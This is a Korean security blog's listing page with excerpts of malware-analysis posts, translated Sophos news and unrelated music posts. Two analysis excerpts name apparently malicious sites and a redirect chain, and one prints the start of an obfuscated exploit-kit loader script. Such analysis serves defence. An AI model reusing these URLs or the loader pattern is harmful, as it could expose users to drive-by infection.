본문 바로가기

분류 전체보기

HEX 값으로 유포하는 악성 Iframe Script 발견지 : http://integridesign.com/David/index.php?target=contact* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다! 위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다! 잠깐 확인을 해보자면 이 코드는 간단하다. "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 ! Decode 를 해보면 연결되는 사이트는 다음과 같다 ! document.write('') ==.. 더보기
[Sophos] 맬웨어 공격! "보안 메시지가 도착했습니다." http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20100 소포스랩은 보안 메시지처럼 가장하여 이메일을 통해 스팸메일로 보내진 광범위한 맬웨어 공격을 차단하고 있습니다.“보안 메시지가 도착했습니다.”라는 제목을 가진 그 이메일은 수신인을 속여 첨부된 ZIP파일을 열도록 합니다.하지만, 이란 ZIP파일에 포함된 것은 소포스 제품이 Troj/Zbot-DPM로 감지하는 트로이목마입니다.다음은 전형적인 메시지를 보여줍니다.(전체 버전을 보시려면 이미지를 클릭하세요.)보안 메시지가 도착했습니다.SECUREDOC이란 첨부파일을 열어서 보안 메시지를 읽어주세요.여러분은 그 파일을 열거나 여러분의 컴퓨터에 다운로드 하게 될 것입니다. 제일 좋.. 더보기
[Sophos] Firefox용 Foxit PDF 플러그인에서 보고된 취약성 - 완화시키는 법 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20000 PDF 취약성과 익스플로잇에 대해 생각할 때, 가장 먼저 떠오르는 단어는 아마도 Adobe일 겁니다.그 이유는 Adobe PDF 리더가 오랜 시간 동안 시장에서 가장 널리 사용되는 제품이었고 공격자와 연구원들에게 가장 많은 타깃이 되어왔기 때문입니다.하지만 PDF 소프트웨어 시장에는 수많은 도전자들이 있는데, 다만 “다른 점”은 스스로 보안을 운영하기에는 충분하지 않다는 것을 명심하십시오.또한, Adobe가 자체 보안에 중점을 둔 sandbox 기능이 있는 Reader X를 출시했기 때문에, 사기꾼들과 연구원들은 Adobe PDF가 크랙하기에 훨씬 더 힘들다는 것을 알게.. 더보기
[Sophos] 보통의 IT 직원이 어떻게 봇넷 사이버범죄자를 잡는데 도움을 줄까요. http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=19900 베테랑 사이버범죄 조사관 Bob Burls는 수천만 달러를 벌어드린 봇마스터에게 유죄를 선고하도록 도움을 준 IT 직원의 성실함이 돋보인 케이스를 돌이켜 봅니다.맬웨어 공격 배후에 있는 자를 찾기에 관계당국만으로는 충분하지 않습니다. 성공적인 유죄판결을 보장하기 위해서, 범죄가 발생했었다는 희생자의 보고가 또한 필요합니다.다음 케이스에서 보여주듯이, 컴퓨터를 사용하는 일반인 중의 한 사람이 사이버범죄의 몰락을 가져오는데 도움을 주는 퍼즐게임의 필수 조각이 될 수 있었습니다.2006년 11월에 특히 공격적인 맬웨어 하나가 스코틀랜드 야드(런던경찰국) 컴퓨터 범죄부의 공지사.. 더보기
[M/V] The All-American Rejects - The Wind Blows 금주 소개 해드릴 노래는 조금 오래 되었지만 요새 듣고 있는 The All-American Rejects - When The World Comes Down 앨범중 The Wind Blows 입니다! 2002년 부터 활동한 그룹으로서 제 23회 MTV 비디오 뮤직 어워드 최우수그룹뮤직비디오상을 받은 그룹으로서 실력이 있고 노래 또한 인기를 많이 받는 그룹입니다! 가수 : The All-American Rejects앨범 : 정규앨범(When The World Comes Down)타이틀 곡 : Gives You Hell장르팝 > 팝발매정보 : 2009.02.19 I got to breatheYou can't take that from meCause it's all that you left that's mine.. 더보기
[PAOIN] 과 함께하는 '라이프 오브 파이' 예매권 증정 이벤트! [PAOIN] [PAOIN] 과 함께하는 '라이프 오브 파이' 예매권 증정 이벤트! 더보기
[Sophos] 마야인의 “지구종말”에 대한 파워포인트, 비밀리에 맬웨어로 위장 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=19800 이번 주 초에 나의 동료 피터 서보(Peter Szabo)와 리차드 왕(Richard Wang) 각자는 시간을 떼우기에 좋은 스도쿠(Sudoku) 퍼즐을 만드는 데 사용되는 마이크로소프트 엑셀 스프레드시트로 가장한 맬웨어에 대해 발견하고 그것에 대해 적었습니다.오늘 아침 나는 “2012년에 지구의 종말이 올까요(Will the world end in 2012)?”라는 제목으로 위장된 파워포인트 파일에 대해 또 다른 소포스랩 연구원인 스캇 시타(Scott Sitar)의 연락을 받았습니다.엑셀 스프레드시트처럼, 이 파일은 비주얼 베이직 매크로 코드를 가지고 있어서 [X]가 .. 더보기
골칫덩어리! JSXX 0.44 VIP 디코딩 ! http://kids.woorisoop.org/kids/css/kids.js→http://www.marieclairekorea.com/user/pop/pop_photot.html →http://www.rootmand.com/hndex/index.html (JSXX 0.44 VIP) →http://www.rootmand.com/hndex/swfobject.js →http://www.rootmand.com/hndex/jpg.js var XzAWBt8=navigator.userAgent.toLowerCase(); var kuAyQq8="1"+"1"+"1"; if(document.cookie.indexOf("pCRvCM5=")==-1 && XzAWBt8.indexOf("linux") -1){document.wr.. 더보기
[신나는노래] Enrique Iglesias - Finally Found You ft. Sammy Adams 투표는 하셨는지요?? 모처럼 쉬는 공휴일에 소개 할 곡은 2012.09.24 에 발매된 Enrique Iglesias - Finally Found You ft. Sammy Adams 입니다! Enrique Iglesias에 관심이 없었는데 벌써 10번째 정규 앨범을 낼 정도로 인기가 많다는걸 알게되었습니다! 한편에서는 소개로 라틴 팝의 황태자라고 불린다고 합니다! 가수 : Enrique Iglesias앨범 : 싱글앨범(Finally Found You)타이틀 곡 : Finally Found You ft. Sammy Adams장르팝 > 팝발매정보 : 2012.09.24 You know i'm gon get yaWhatever it takes, get thereNo I won't drop youLike eve.. 더보기
[Sophos]해커들이 당신을 지켜보거나, 채널을 바꾸고 맬웨어를 설치하도록 허용하는 삼성 스마트 TV의 보안 허점 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=19700 당신의 삼성 스마트 TV가 갑자기 채널이 변경되었나요?리모컨이 잘못 눌러졌다고 생각하지 마세요. 당신의 스마트 TV를 해킹한 해커들이 원격에서 그랬을 수가 있습니다.몰타(Malta)에 위치한 보안 컨설팅 업체 리번(ReVuln)의 연구원들은 모델을 밝히지 않은 삼성 LED 3D TV 에서 취약점을 발견하고, 그 TV와 TV에 꽂힌 USB 드라이버에 루트 권한으로 접속하기 위해 그 취약점을 악용하였습니다."TV가 당신을 지켜보고 있다."라는 제목의 비디오에서, 리번은 연구원들이 시스템적으로 만지작거리는 것을 삼성 TV 화면에 보여주고 있습니다.연구원들이 접속하여 제어할 수.. 더보기